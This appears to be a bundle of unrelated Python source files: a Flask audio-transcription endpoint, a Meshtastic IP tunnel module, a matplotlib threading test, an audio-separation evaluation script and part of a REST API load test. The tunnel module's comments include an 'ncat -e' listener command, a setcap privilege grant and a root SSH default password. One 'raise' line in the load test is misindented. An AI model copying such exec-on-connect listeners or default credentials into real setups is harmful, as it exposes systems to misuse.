        Process(target=download_yt_video, args=(yt_url, )).start()
        downloaded_video_path = downloaded_audio_path.replace('.m4a', '.webm')
        return {
            'success': True,
            'audio_url': downloaded_audio_path,
            'download_path': downloaded_video_path,
            'video_url': direct_url,
        }
    return {
        'success': False,
    }
@app.route("/transcribe_local_audio",methods=['POST'])
@cross_origin()
def transcribe_local_audio():
    """Transcribe a local audio file into WebVTT captions.

    JSON body: audio_url (path to a local audio file), vad_level
    (webrtcvad aggressiveness 0-3, default 2), chunk_size (max caption
    window in seconds, default 10).
    Returns {"status", "output": chunked+merged VTT,
    "vad_nochunk": one cue per VAD segment}.
    """
    req_data = json.loads(request.data)
    status = "SUCCESS"
    #print(req_data)
    audio_uri = req_data.get('audio_url',None)
    vad_val = req_data.get('vad_level',2)
    chunk_size = float(req_data.get('chunk_size',10.0))
    #la = req_data['config']['language']['sourceLanguage']
    #af = req_data['config']['audioFormat']
    if audio_uri in [None,'']:
        status = 'ERROR'
        return jsonify({"status":status, "output":""})
    print(audio_uri)
    fp_arr = load_data(audio_uri,of='raw')
    # try:
    #     fp_arr = load_data(audio_uri,of='raw')
    # except Exception as e:
    #     status = 'ERROR'
    #     print(e)
    #     return jsonify({"status":status, "output":""})
    #return jsonify({'op':align(fp_arr,cuda)})
    op = "WEBVTT\n\n"
    op_nochunk = "WEBVTT\n\n"
    sample_rate = 16000
    # Split the audio into voiced segments with WebRTC VAD (30 ms frames,
    # 300 ms padding window).
    vad = webrtcvad.Vad(vad_val) #2
    frames = frame_generator(30, fp_arr, sample_rate)
    frames = list(frames)
    segments = vad_collector(sample_rate, 30, 300, vad, frames)
    vad_time_stamps = []
    counter = 1
    # Per VAD segment: convert raw 16-bit PCM to a normalised float array,
    # then transcribe it in chunk_size-second windows.
    for i, (segment, (start_frame, end_frame)) in enumerate(segments):
        song=AudioSegment.from_raw(io.BytesIO(segment), sample_width=2, frame_rate=16000, channels=1)
        samples = song.get_array_of_samples()
        fp_arr = np.array(samples).T.astype(np.float64)
        fp_arr /= np.iinfo(samples.typecode).max
        arr = fp_arr.reshape(-1)
        op_nochunk += str(i+1) + '\n'
        op_nochunk += "{0}.000 --> {1}.000".format(time.strftime('%H:%M:%S', time.gmtime(start_frame)),time.strftime('%H:%M:%S', time.gmtime(end_frame)))+'\n'
        #arr = np.array(samples)
        # print(f'Start frame: {start_frame},\t End frame: {end_frame}')
        for e,frame in enumerate(range(0,len(arr),int(chunk_size))):
            #op += str(i+e+1) + '\n'
            if end_frame-frame-start_frame <= chunk_size + 0.1:
                # Final (short) window of this segment.
                #op += "{0}.000 --> {1}.000".format(time.strftime('%H:%M:%S', time.gmtime(start_frame+frame)),time.strftime('%H:%M:%S', time.gmtime(end_frame)))+'\n'
                # print(len(arr[int((start_frame+frame)*16000):int((end_frame)*16000)]),'Done')
                # print(end_frame-frame-start_frame)
                op_pred = align(arr[int((frame)*16000):int((end_frame)*16000)],cuda) +'\n\n'
                # Keep only non-trivial transcripts (more than 2 chars).
                if len(op_pred.strip()) >2:
                    op += str(counter) + '\n'
                    counter += 1
                    #op += str(i+e+1) + '\n'
                    op += "{0}.000 --> {1}.000".format(time.strftime('%H:%M:%S', time.gmtime(start_frame+frame)),time.strftime('%H:%M:%S', time.gmtime(end_frame)))+'\n'
                    op+= op_pred
                    op_nochunk += op_pred
                #op+= op_pred
                #op_nochunk += op_pred
                break
            else:
                #print('\nHere')
                # print(int((start_frame+frame)*16000),int((start_frame+frame+5.1)*16000),'Done')
                op_pred = align(arr[int((frame)*16000):int((frame+chunk_size+0.1)*16000)],cuda)
                if len(op_pred.strip()) > 2:
                    op += str(counter) + '\n'
                    counter += 1
                    #op += str(i+e+1) + '\n'
                    op += "{0}.000 --> {1}.000".format(time.strftime('%H:%M:%S', time.gmtime(start_frame+frame)),time.strftime('%H:%M:%S', time.gmtime(start_frame+frame+chunk_size)))+'\n'
                    op+= op_pred + '\n'
                    op_nochunk += op_pred +' '
                #op += "{0}.000 --> {1}.000".format(time.strftime('%H:%M:%S', time.gmtime(start_frame+frame)),time.strftime('%H:%M:%S', time.gmtime(start_frame+frame+chunk_size)))+'\n'
                #op_pred = align(arr[int((frame)*16000):int((frame+chunk_size+0.1)*16000)],cuda)
                #op+= op_pred + '\n'
                #op_nochunk += op_pred +' '
        op += '\n'
        op_nochunk += '\n'
    # print(op)
    #return jsonify({'output':op})
    # op += str(i+1) + '\n'
    # op += "{0}.000 --> {1}.000".format(time.strftime('%H:%M:%S', time.gmtime(start_frame)),time.strftime('%H:%M:%S', time.gmtime(end_frame)))+'\n'
    # op += align(arr,cuda) +'\n'
    #print(op)
    # Round-trip through a file so webvtt can parse the cues, then merge
    # short neighbouring captions (<= 4 words) pairwise.
    with open('placeholder.vtt', 'w') as f:
        f.write(op)
    captions = webvtt.read('placeholder.vtt')
    merged_caption = webvtt.WebVTT()
    for i in range(0, len(captions), 2):
        if i + 1 < len(captions):
            curr_caption_len = len(captions[i].text.split(' '))
            next_caption_len = len(captions[i+1].text.split(' '))
            if curr_caption_len <= 4 or next_caption_len <= 4:
                m_cap = webvtt.Caption(
                    captions[i].start,
                    captions[i+1].end,
                    captions[i].text + ' ' + captions[i+1].text
                )
                merged_caption.captions.append(m_cap)
            else:
                m_cap = webvtt.Caption(
                    captions[i].start,
                    captions[i].end,
                    captions[i].text
                )
                merged_caption.captions.append(m_cap)
            # NOTE(review): this append runs after BOTH branches above, so
            # a merged pair also emits captions[i+1] on its own — confirm
            # this duplication is intended.
            m_cap = webvtt.Caption(
                captions[i+1].start,
                captions[i+1].end,
                captions[i+1].text
            )
            merged_caption.captions.append(m_cap)
        # NOTE(review): i == len(captions) can never be true inside this
        # range() loop, so an odd trailing caption is silently dropped.
        if i == len(captions):
            m_cap = webvtt.Caption(
                captions[i+1].start,
                captions[i+1].end,
                captions[i+1].text
            )
            merged_caption.captions.append(m_cap)
    op = merged_caption.content
    return jsonify({"status":status, "output":op,'vad_nochunk':op_nochunk})
'''
captions = webvtt.read('placeholder.vtt')
source_sentences = [caption.text.replace('\r', '').replace('\n', ' ') for caption in captions]
sent = ' '.join(source_sentences)
sent = sent.lower()
sent = re.sub(r'[^\w\s]', '', sent)
punctuated = punct_model.punctuate(sent)
tokenised = sent_tokenize(punctuated)
# words = punctuated.split(' ')
# len_marker = 0
# for i in range(len(captions)):
# curr = len(captions[i].text.split(' '))
# captions[i].text = ' '.join(words[len_marker: len_marker+curr])
# len_marker += curr
# # return captions.content
# captions.save('normalised.vtt')
final_vtt = webvtt.WebVTT()
start = datetime.datetime.strptime('00:00:00.000', '%H:%M:%S.%f')
for i in range(len(tokenised)):
len_ = len(tokenised[i].split(' '))
secs = len_ // 2
micro = round((len_/3)%1*1000)
delta = datetime.timedelta(seconds=secs, microseconds=micro)
end = start + delta
caption = webvtt.Caption(
start.time().strftime('%H:%M:%S.%f'),
end.time().strftime('%H:%M:%S.%f'),
tokenised[i]
)
start = end
final_vtt.captions.append(caption)
final_vtt.save('normalised.vtt')
with open('normalised.vtt', 'r') as f:
content = f.read()
return jsonify({"status":status, "output":content})
# return jsonify({"status":status, "output":""})
# return None
'''
if __name__ == '__main__':
    #app.logger.setLevel(logging.DEBUG)
    #from gevent import pywsgi
    #from geventwebsocket.handler import WebSocketHandler
    # Serve the Flask app with gevent's production WSGI server on port 5000.
    server = WSGIServer(('', 5000), app)
    print("Server listening on: http://localhost:" + str(5000))
    server.serve_forever()
#@app.route("/infer_ulca_en",methods=['POST'])
#@cross_origin()
#def infer_ulca_en():
# req_data = json.loads(request.data)
# status = "SUCCESS"
# preds = []
# for f in req_data['audio']:
# audio_uri, audio_bytes = f.get('audioUri',None),f.get('audioContent',None)
# la = req_data['config']['language']['sourceLanguage']
# af = req_data['config']['audioFormat']
# if audio_uri in [None,''] and audio_bytes in [None,'']:
# status = 'ERROR'
# continue
# try:
# if audio_bytes == None:
# fp_arr = load_data(audio_uri,of='url',lang=la)
# else:
# nm = str(round(time.time() * 1000))
# fp_arr = load_data(audio_bytes,of='bytes',lang=la,bytes_name=nm+"."+af)
# except:
# status = 'ERROR'
# continue
#
# op = "WEBVTT\n\n"
# for e,frame in enumerate(range(0,len(fp_arr),5)):
# op += str(e+1) + '\n'
# op += "{0}.000 --> {1}.000".format(time.strftime('%H:%M:%S', time.gmtime(frame)),time.strftime('%H:%M:%S', time.gmtime(frame+5)))+'\n'
# try:
# op+= align(fp_arr[frame*16000:int((frame+5.1)*16000)],cuda) +'\n'
# #print(align(fp_arr[frame*16000:int((frame+5.1)*16000)],cuda))
# except:
# op += ''
# break
# op += '\n'
# preds.append({'source':op})
# print(op)
# with open('placeholder.vtt', 'w') as f:
# f.write(op)
# captions = webvtt.read('placeholder.vtt')
# source_sentences = [caption.text.replace('\r', '').replace('\n', ' ') for caption in captions]
#
# sent = ' '.join(source_sentences)
# sent = sent.lower()
# punctuated = punct_model.punctuate(sent)
# # tokenised = sent_tokenize(punctuated)
#
# words = punctuated.split(' ')
#
# len_marker = 0
# for i in range(len(captions)):
# curr = len(captions[i].text.split(' '))
# captions[i].text = ' '.join(words[len_marker: len_marker+curr])
#
# len_marker += curr
# # return captions.content
# captions.save('normalised.vtt')
#
# with open('normalised.vtt', 'r') as f:
# content = f.read()
#
# preds.append({'source':content})
# return jsonify({"status":status, "output":preds})
|
tunnel.py
|
# code for IP tunnel over a mesh
# Note python-pytuntap was too buggy
# using pip3 install pytap2
# make sure to "sudo setcap cap_net_admin+eip /usr/bin/python3.8" so python can access tun device without being root
# sudo ip tuntap del mode tun tun0
# sudo bin/run.sh --port /dev/ttyUSB0 --setch-shortfast
# sudo bin/run.sh --port /dev/ttyUSB0 --tunnel --debug
# ssh -Y root@192.168.10.151 (or dietpi), default password p
# ncat -e /bin/cat -k -u -l 1235
# ncat -u 10.115.64.152 1235
# ping -c 1 -W 20 10.115.64.152
# ping -i 30 -W 30 10.115.64.152
# FIXME: use a more optimal MTU
from . import portnums_pb2
from pubsub import pub
import logging, threading
# A new non standard log level that is lower level than DEBUG
LOG_TRACE = 5
# fixme - find a way to move onTunnelReceive inside of the class
# Module-level singleton set by Tunnel.__init__ so the pubsub callback
# onTunnelReceive (a free function) can reach the active instance.
tunnelInstance = None
"""A list of chatty UDP services we should never accidentally
forward to our slow network"""
udpBlacklist = {
    1900, # SSDP
    5353, # multicast DNS
}
"""A list of TCP services to block"""
tcpBlacklist = {}
"""A list of protocols we ignore"""
protocolBlacklist = {
    0x02, # IGMP
    0x80, # Service-Specific Connection-Oriented Protocol in a Multilink and Connectionless Environment
}
def hexstr(barray):
    """Render *barray* as colon-separated two-digit lowercase hex octets."""
    return ":".join(format(octet, '02x') for octet in barray)
def ipstr(barray):
    """Render *barray* as a dotted-decimal (IPv4-style) string."""
    return ".".join(str(octet) for octet in barray)
def readnet_u16(p, offset):
    """Read a big-endian (network byte order) u16 from p at offset."""
    high, low = p[offset], p[offset + 1]
    return (high << 8) | low
def onTunnelReceive(packet, interface):
    """Callback for received tunneled messages from mesh
    FIXME figure out how to do closures with methods in python"""
    # Delegates to the module-level singleton set in Tunnel.__init__.
    tunnelInstance.onReceive(packet)
class Tunnel:
    """A TUN based IP tunnel over meshtastic"""
    def __init__(self, iface, subnet=None, netmask="255.255.0.0"):
        """
        Constructor
        iface is the already open MeshInterface instance
        subnet is used to construct our network number (normally 10.115.x.x)
        """
        if subnet is None:
            subnet = "10.115"
        self.iface = iface
        self.subnetPrefix = subnet
        # Publish ourselves as the module-level singleton used by the
        # free-function pubsub callback onTunnelReceive.
        global tunnelInstance
        tunnelInstance = self
        logging.info("Starting IP to mesh tunnel (you must be root for this *pre-alpha* feature to work). Mesh members:")
        pub.subscribe(onTunnelReceive, "meshtastic.receive.data.IP_TUNNEL_APP")
        myAddr = self._nodeNumToIp(self.iface.myInfo.my_node_num)
        for node in self.iface.nodes.values():
            nodeId = node["user"]["id"]
            ip = self._nodeNumToIp(node["num"])
            logging.info(f"Node { nodeId } has IP address { ip }")
        logging.debug("creating TUN device with MTU=200")
        # FIXME - figure out real max MTU, it should be 240 - the overhead bytes for SubPacket and Data
        from pytap2 import TapDevice
        self.tun = TapDevice(name="mesh")
        self.tun.up()
        self.tun.ifconfig(address=myAddr,netmask=netmask,mtu=200)
        logging.debug(f"starting TUN reader, our IP address is {myAddr}")
        # Daemon thread so the reader does not keep the process alive.
        self._rxThread = threading.Thread(target=self.__tunReader, args=(), daemon=True)
        self._rxThread.start()
    def onReceive(self, packet):
        """Handle an IP_TUNNEL_APP packet from the mesh: write its raw IP
        payload to the TUN device unless it is our own or filtered."""
        p = packet["decoded"]["data"]["payload"]
        if packet["from"] == self.iface.myInfo.my_node_num:
            logging.debug("Ignoring message we sent")
        else:
            logging.debug(f"Received mesh tunnel message type={type(p)} len={len(p)}")
            # we don't really need to check for filtering here (sender should have checked), but this provides
            # useful debug printing on types of packets received
            if not self._shouldFilterPacket(p):
                self.tun.write(p)
    def _shouldFilterPacket(self, p):
        """Given a packet, decode it and return true if it should be ignored"""
        protocol = p[8 + 1]  # IPv4 protocol field (byte 9 of the header)
        srcaddr = p[12:16]
        destAddr = p[16:20]
        subheader = 20  # transport header starts after the 20-byte IPv4 header
        ignore = False # Assume we will be forwarding the packet
        if protocol in protocolBlacklist:
            ignore = True
            logging.log(LOG_TRACE, f"Ignoring blacklisted protocol 0x{protocol:02x}")
        elif protocol == 0x01: # ICMP
            icmpType = p[20]
            icmpCode = p[21]
            checksum = p[22:24]
            logging.debug(f"forwarding ICMP message src={ipstr(srcaddr)}, dest={ipstr(destAddr)}, type={icmpType}, code={icmpCode}, checksum={checksum}")
            # reply to pings (swap src and dest but keep rest of packet unchanged)
            #pingback = p[:12]+p[16:20]+p[12:16]+p[20:]
            #tap.write(pingback)
        elif protocol == 0x11: # UDP
            srcport = readnet_u16(p, subheader)
            destport = readnet_u16(p, subheader + 2)
            if destport in udpBlacklist:
                ignore = True
                logging.log(LOG_TRACE, f"ignoring blacklisted UDP port {destport}")
            else:
                logging.debug(f"forwarding udp srcport={srcport}, destport={destport}")
        elif protocol == 0x06: # TCP
            srcport = readnet_u16(p, subheader)
            destport = readnet_u16(p, subheader + 2)
            if destport in tcpBlacklist:
                ignore = True
                logging.log(LOG_TRACE, f"ignoring blacklisted TCP port {destport}")
            else:
                logging.debug(f"forwarding tcp srcport={srcport}, destport={destport}")
        else:
            # Unknown protocols are forwarded, just with a warning.
            logging.warning(f"forwarding unexpected protocol 0x{protocol:02x}, src={ipstr(srcaddr)}, dest={ipstr(destAddr)}")
        return ignore
    def __tunReader(self):
        """Daemon thread body: read IP packets from the TUN device and
        forward any non-filtered ones into the mesh."""
        tap = self.tun
        logging.debug("TUN reader running")
        while True:
            p = tap.read()
            #logging.debug(f"IP packet received on TUN interface, type={type(p)}")
            destAddr = p[16:20]
            if not self._shouldFilterPacket(p):
                self.sendPacket(destAddr, p)
    def _ipToNodeId(self, ipAddr):
        """Map an IP address to a mesh node id, or None if no node matches.
        x.x.255.255 maps to the broadcast id '^all'."""
        # We only consider the last 16 bits of the nodenum for IP address matching
        ipBits = ipAddr[2] * 256 + ipAddr[3]
        if ipBits == 0xffff:
            return "^all"
        for node in self.iface.nodes.values():
            nodeNum = node["num"] & 0xffff
            # logging.debug(f"Considering nodenum 0x{nodeNum:x} for ipBits 0x{ipBits:x}")
            if (nodeNum) == ipBits:
                return node["user"]["id"]
        return None
    def _nodeNumToIp(self, nodeNum):
        """Build a tunnel IP from the low 16 bits of a mesh node number."""
        return f"{self.subnetPrefix}.{(nodeNum >> 8) & 0xff}.{nodeNum & 0xff}"
    def sendPacket(self, destAddr, p):
        """Forward the provided IP packet into the mesh"""
        nodeId = self._ipToNodeId(destAddr)
        if nodeId is not None:
            logging.debug(f"Forwarding packet bytelen={len(p)} dest={ipstr(destAddr)}, destNode={nodeId}")
            self.iface.sendData(p, nodeId, portnums_pb2.IP_TUNNEL_APP, wantAck = False)
        else:
            logging.warning(f"Dropping packet because no node found for destIP={ipstr(destAddr)}")
    def close(self):
        """Shut down the TUN device."""
        self.tun.close()
|
threading_test.py
|
#! /usr/bin/python
"""
Test by Karen Tracey for threading problem reported in
http://www.mail-archive.com/matplotlib-devel@lists.sourceforge.net/msg04819.html
and solved by JDH in git commit 175e3ec5bed9144.
"""
from __future__ import print_function
import os
import threading
import traceback
import numpy as np
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
# Number of worker threads rendering PNGs concurrently.
thread_count = 8
# How many figures each thread renders before stopping.
max_iterations = 50
# Set by any worker that hits an exception; signals the other threads to stop early.
exception_raised = False
def png_thread(tn):
    """Worker: repeatedly render a histogram to out<tn>.png, up to max_iterations.

    Sets the module-global ``exception_raised`` flag on failure so sibling
    threads stop early; deletes the output file when done.
    """
    png_fname = 'out%d.png' % tn
    vals = 100 + 15 * np.random.randn(10000)
    i = 0
    global exception_raised
    while not exception_raised and i < max_iterations:
        i += 1
        failed = False
        with open(png_fname, 'wb') as png_f:
            try:
                fig = Figure()
                ax = fig.add_subplot(111)
                ax.hist(vals, 50)
                FigureCanvas(fig).print_png(png_f)
            except Exception:
                # NOTE: Python 3 unbinds the `except ... as` name when the handler
                # exits, so the original `if excp:` raised NameError after a caught
                # exception. Record the outcome in a flag and format the traceback
                # while still inside the handler (format_exc takes no exception arg).
                failed = True
                print('png_thread %d failed on iteration %d:' % (tn, i))
                print(traceback.format_exc())
        if failed:
            exception_raised = True
        else:
            print('png_thread %d completed iteration %d.' % (tn, i))
    os.unlink(png_fname)
def main(tc):
    """Spawn *tc* PNG-rendering threads, wait for them all, and report the outcome."""
    workers = [threading.Thread(target=png_thread, args=(n + 1,)) for n in range(tc)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    if exception_raised:
        msg = 'Failed! Exception raised before %d threads completed %d iterations.'
    else:
        msg = 'Success! %d threads completed %d iterations with no exceptions raised.'
    print(msg % (tc, max_iterations))
if __name__ == "__main__":
    # Run the stress test with the configured number of threads.
    main(thread_count)
|
eval.py
|
import sys
import os
sys.path.append(os.getcwd())
import threading
import time
import glob
import numpy as np
from utils.file_io import *
from argparse import ArgumentParser
import speechmetrics as sm
# Maximum number of evaluation worker threads per validation step.
MAX_THREAD = 3
# Project root; data paths below are resolved relative to this.
root = os.getcwd()
# Location of the MUSDB18-HQ test split (ground-truth references).
MUSDB_TEST = "data/musdb18hq/test"
def sdr(references, estimates):
    """Compute SDR in dB for one song.

    Both arrays are indexed [batch, time, channels]; the sums run over the
    time and channel axes, yielding one score per leading entry.
    """
    eps = 1e-7  # avoid numerical errors (log of / division by zero)
    signal_power = np.sum(np.square(references), axis=(1, 2)) + eps
    error_power = np.sum(np.square(references - estimates), axis=(1, 2)) + eps
    return 10 * np.log10(signal_power / error_power)
# speechmetrics evaluators; both expect arrays shaped [samples, channels].
# window=1 / window=np.inf are the speechmetrics window lengths — presumably
# seconds; confirm against the speechmetrics docs.
metrics_bsseval = sm.load(["bsseval"], window=1) # [samples, channels]
metrics_sisdr = sm.load(["sisdr"], window=np.inf) # [samples, channels]
parser = ArgumentParser()
parser.add_argument('--step', type=str, default="", help="A fold contain a validation step results")
parser.add_argument('--path', type=str, default="", help="A fold contain all validation step results (step's super dir)")
parser.add_argument('--type', type=str, default="", help="Evaluation data type")
args = parser.parse_args()
# NOTE(review): shadows the builtin `type`; every helper below reads this global.
type = args.type
if(len(args.step) == 0 and len(args.path) == 0):
    raise RuntimeError("step argument and path argument at least should have one non-empty.")
# def unify_energy(est, target):
#     max_est, max_target = np.max(np.abs(est)), np.max(np.abs(target))
#     ratio = max_est/max_target
#     return est/ratio, target
def evaluate_file(target, est, step_dir, fname):
    """
    Evaluate one estimate against its reference, caching the scores as a pickle.

    :param target: target .wav file absolute path
    :param est: est .wav file absolute path
    :param step_dir: path to validation step results, absolute path
    :param fname: file name to evaluate, not path
    :return: dict mapping metric name -> score values
    """
    cache_path = os.path.join(step_dir, fname, type + ".pkl")
    if os.path.exists(cache_path):
        # already evaluated on a previous run; reuse the cached scores
        scores = load_pickle(cache_path)
    else:
        ref = read_wave(target, sample_rate=44100)
        hyp = read_wave(est, sample_rate=44100)
        hyp, ref = hyp.astype(np.float32), ref.astype(np.float32)
        scores = metrics_bsseval(hyp, ref, rate=44100)
        scores.update(metrics_sisdr(hyp, ref, rate=44100))
        scores['sdr_ismir'] = sdr(ref[None, ...], hyp[None, ...])
        save_pickle(scores, cache_path)
    print(os.getpid(), fname, " - Score: ", [(each, np.nanmedian(scores[each])) for each in scores.keys()])
    return scores
def evaluate_step(step_dir, files: list):
    """
    Evaluate a list of songs for one validation step, skipping missing files.

    :param step_dir: path to validation step results, absolute path
    :param files: list of file names
    :return: None
    """
    # (removed an unused `threading.current_thread()` local)
    for file in files:
        ref = os.path.join(root, MUSDB_TEST, file, type + ".wav")
        est = os.path.join(step_dir, file, type + ".wav")
        try:
            evaluate_file(ref, est, step_dir, file)
        except Exception as e:
            # Best-effort: a missing/corrupt estimate must not kill the worker
            # thread, but the skip should at least be visible (was a silent pass).
            print(est, "could not be evaluated, skip this file. (%s)" % e)
def evaluate_step_multiprocess(step_dir):
    """
    Evaluate every test song under *step_dir* using MAX_THREAD worker threads,
    then aggregate the per-song scores.

    :param step_dir: path to validation step results, absolute path
    :return: None
    """
    files = os.listdir(os.path.join(root, MUSDB_TEST))
    todos = divide_list(files, MAX_THREAD)
    threads = []
    for chunk in todos:
        threads.append(threading.Thread(target=evaluate_step, args=(step_dir, chunk)))
    for t in threads:
        # t.name / t.daemon replace the deprecated getName()/setDaemon().
        print("Start: ", t.ident, t.name)
        t.daemon = True
        t.start()
    # join() blocks until each worker finishes — no busy-wait polling loop needed.
    for t in threads:
        t.join()
    print("Done!")
    print("Start aggregating scores...")
    aggregate_thread_results(step_dir=step_dir)
def aggregate_thread_results(step_dir):
    """
    Collect every per-song <type>.pkl under *step_dir*, aggregate the scores,
    and write evaluation_result_<type>.json into *step_dir*.
    """
    eval = []
    # glob already yields paths rooted at step_dir; re-joining step_dir (as the
    # original did) duplicated the prefix whenever step_dir was a relative path.
    for fname in glob.glob(os.path.join(step_dir, "*/" + type + ".pkl")):
        bsseval = load_pickle(fname)
        eval.append(bsseval)
    aggregate = aggregate_score(eval)
    print(aggregate)
    write_json(aggregate, os.path.join(step_dir, "evaluation_result_" + type + ".json"))
    print("Done")
def aggregate_score(outputs):
    """
    Aggregate per-song metric dicts into one median score per metric.

    :param outputs: list of dicts, one per song: {"<metric>": per-window values}
    :return: {"<metric>": median over songs of each song's nanmedian}

    The metric names are taken from the first song's dict (as before).
    Unlike the original, the caller's dicts are no longer mutated in place.
    """
    if not outputs:
        return {}
    metrics = list(outputs[0].keys())
    # Per-song score: nanmedian over that song's windows, computed locally.
    per_song = [{m: np.nanmedian(element[m]) for m in metrics} for element in outputs]
    return {m: float(np.median([song[m] for song in per_song])) for m in metrics}
def evaluate_path(path):
    """
    Run multithreaded evaluation for every validation-step directory under *path*.

    :param path: directory whose subdirectories are individual validation steps
    """
    # (removed an unused `files = os.listdir(...)` local)
    for step in os.listdir(path):
        step_dir = os.path.join(path, step)
        print("EVALUATE PATH: ", step_dir)
        if os.path.isdir(step_dir):
            evaluate_step_multiprocess(step_dir)
def divide_list(li, thread_num):
    """Split *li* into *thread_num* nearly equal contiguous chunks (some may be empty)."""
    # Evenly spaced (truncated) boundaries: thread_num+1 cut points over the list.
    bounds = np.linspace(0, len(li), thread_num + 1).astype(int)
    return [li[bounds[i]:bounds[i + 1]] for i in range(thread_num)]
if __name__ == "__main__":
    # --step evaluates one validation-step directory; --path walks all steps under it.
    if(len(args.step) != 0):
        evaluate_step_multiprocess(args.step)
    if(len(args.path) != 0):
        evaluate_path(path=args.path)
|
perf_test_rest_api.py
|
"""
Description:
Scale up REST API functional tests to performance tests using threading.
Note:
requests module is synchronous and does not support asyncio to await for responses.
Another option is to use aiohttp module, which uses asyncio for asynchrony. This option requires re-writing
the API test functions, though they are quite like requests functions, and measuring the response time
is not straight forward as requests and the response time may not be accurate for the nature of asyncio.
Features:
Python version: 3.7 or above
Install:
pip install -U requests
Run:
"""
from time import sleep
import time
from datetime import datetime
import logging
from logging.handlers import RotatingFileHandler
import requests
import json
import os
import pdb
import ast
import inspect
import random
# import asyncio
import sys
import threading
from threading import Thread, Event, Timer
import queue
if sys.version_info < (3,7):
raise Exception("Requires Python 3.7 or above.")
# Change log level to error to improve client performance.
LOG_LEVEL = logging.DEBUG # DEBUG, INFO, WARNING, ERROR, CRITICAL
# Assume project structure as below:
# Scripts - python scripts
# Logs - logs
# run.bat - batch script to run
# root_path is parent folder of Scripts folder (one level up)
root_path = os.path.dirname( os.path.dirname(os.path.realpath(__file__)) )
# %(levelname)7s to align 7 bytes to right, %(levelname)-7s to left.
# common_formatter = logging.Formatter('%(asctime)s [%(levelname)-7s][ln-%(lineno)-3d]: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
# Shared log-line format: timestamp, padded level, source line number, message.
common_formatter = logging.Formatter('%(asctime)s [%(levelname)-7s][ln-%(lineno)-3d]: %(message)s')
# Note: To create multiple log files, must use different logger name.
def setup_logger(log_file, level=logging.INFO, name='', formatter=common_formatter):
    """Create (or fetch) the named logger and attach a fresh file handler.

    Note: to create multiple log files, each must use a different logger name.
    """
    logger = logging.getLogger(name)
    logger.setLevel(level)
    # Overwrite the file on each run; swap in a RotatingFileHandler
    # (e.g. maxBytes=1024, backupCount=5) for capped log sizes.
    file_handler = logging.FileHandler(log_file, mode='w')
    file_handler.setFormatter(formatter)
    logger.addHandler(file_handler)
    return logger
# Both loggers write under <root>/Logs and are recreated (mode='w') on each run.
# default debug logger
debug_log_filename = root_path + os.sep + 'Logs' + os.sep + 'debug.log'
log = setup_logger(debug_log_filename, LOG_LEVEL,'log')
# logger for API outputs
# api_formatter = logging.Formatter('%(asctime)s: %(message)s', datefmt='%Y-%m-%d %I:%M:%S')
api_formatter = logging.Formatter('%(asctime)s: %(message)s')
api_outputs_filename = root_path + os.sep + 'Logs' + os.sep + 'api_outputs.log'
log_api = setup_logger(api_outputs_filename, LOG_LEVEL,'log_api',formatter = api_formatter)
# pretty print Restful request to API log
# argument is request object
def pretty_print_request(request):
    """
    Pay attention at the formatting used in this function because it is programmed to be pretty printed and may differ from the actual request.
    """
    header_lines = '\n'.join('{}: {}'.format(k, v) for k, v in request.headers.items())
    log_api.info('{}\n{}\n\n{}\n\n{}\n'.format(
        '-----------Request----------->',
        request.method + ' ' + request.url,
        header_lines,
        request.body)
    )
# pretty print Restful request to API log
# argument is response object
def pretty_print_response(response):
    """Log a response (status code, headers, raw text) in a readable layout."""
    header_lines = '\n'.join('{}: {}'.format(k, v) for k, v in response.headers.items())
    log_api.info('{}\n{}\n\n{}\n\n{}\n'.format(
        '<-----------Response-----------',
        'Status code:' + str(response.status_code),
        header_lines,
        response.text
    ))
# argument is request object
# display body in json format explicitly with expected indent. Actually most of the time it is not very necessary because body is formatted in pretty print way.
def pretty_print_request_json(request):
    """Log a request, rendering its JSON body with explicit 4-space indentation."""
    body = json.dumps(ast.literal_eval(request.body), indent=4)
    header_lines = '\n'.join('{}: {}'.format(k, v) for k, v in request.headers.items())
    log_api.info('{}\n{}\n\n{}\n\n{}\n'.format(
        '-----------Request----------->',
        request.method + ' ' + request.url,
        header_lines,
        body)
    )
# argument is response object
# display body in json format explicitly with expected indent. Actually most of the time it is not very necessary because body is formatted in pretty print way.
def pretty_print_response_json(response):
    """Log a response, rendering its JSON body with explicit 4-space indentation."""
    header_lines = '\n'.join('{}: {}'.format(k, v) for k, v in response.headers.items())
    log_api.info('{}\n{}\n\n{}\n\n{}\n'.format(
        '<-----------Response-----------',
        'Status code:' + str(response.status_code),
        header_lines,
        json.dumps(response.json(), indent=4)
    ))
class TestAPI:
    """
    Performance Test Restful HTTP API examples.

    Worker threads run loop_test(); each API call pushes
    [test_name, 'pass'|'fail'|'exception', elapsed_seconds_or_None]
    onto queue_results, which stats() drains periodically.
    """
    def __init__(self):
        log.debug('To load test data.')
        self.queue_results = queue.Queue()
        # test start and end time
        self.start_time = 0
        self.end_time = 0
        # request per second
        # self.rps_min = 0
        self.rps_mean = 0
        # self.rps_max = 0
        self.total_tested_requests = 0
        self.total_tested_time = 0
        self.total_pass_requests = 0
        # time per request
        self.tpr_min = 999
        self.tpr_mean = 0
        self.tpr_max = 0
        self.sum_response_time = 0
        # failures
        self.total_fail_requests = 0
        self.total_exception_requests = 0
        # event flag to set and check test time is up.
        self.event_time_up = Event()
        # event flag to indicate test is done, either normally or by interruption
        self.event_test_done = Event()
        self.timer = None

    # post with headers, json body
    def test_post_headers_body_json(self):
        """POST a small JSON payload and validate the echoed URL.

        :return: ('pass'|'fail'|'exception', elapsed_seconds_or_None)
        """
        payload = {'key1': 1, 'key2': 'value2'}
        # Common headers are taken care of by self.post(). Convert dict to json
        # with json.dumps(); str(payload) is risky because JSON needs double quotes.
        url = 'https://httpbin.org/post'
        resp = self.post(url, data=json.dumps(payload, indent=4))
        if resp is None:
            log.error('Test %s failed with exception.' % inspect.stack()[0][3])
            return 'exception', None
        elif resp.status_code != 200:
            # fixed typo: was `inpsect`, which raised NameError on this branch
            log.error('Test %s failed with response status code %s.' % (inspect.stack()[0][3], resp.status_code))
            return 'fail', resp.elapsed.total_seconds()
        elif resp.json()["url"] != url:
            log.error('Test %s failed with url %s != %s.' % (inspect.stack()[0][3], resp.json()["url"], url))
            return 'fail', resp.elapsed.total_seconds()
        else:
            log.info('Test %s passed.' % inspect.stack()[0][3])
            return 'pass', resp.elapsed.total_seconds()
        """ Request HTTP body:
            {   "key1": 1,
                "key2": "value2"
            }
        """

    # To run this test using Flask mocking service,
    # start mock service first: python flask_mock_service.py
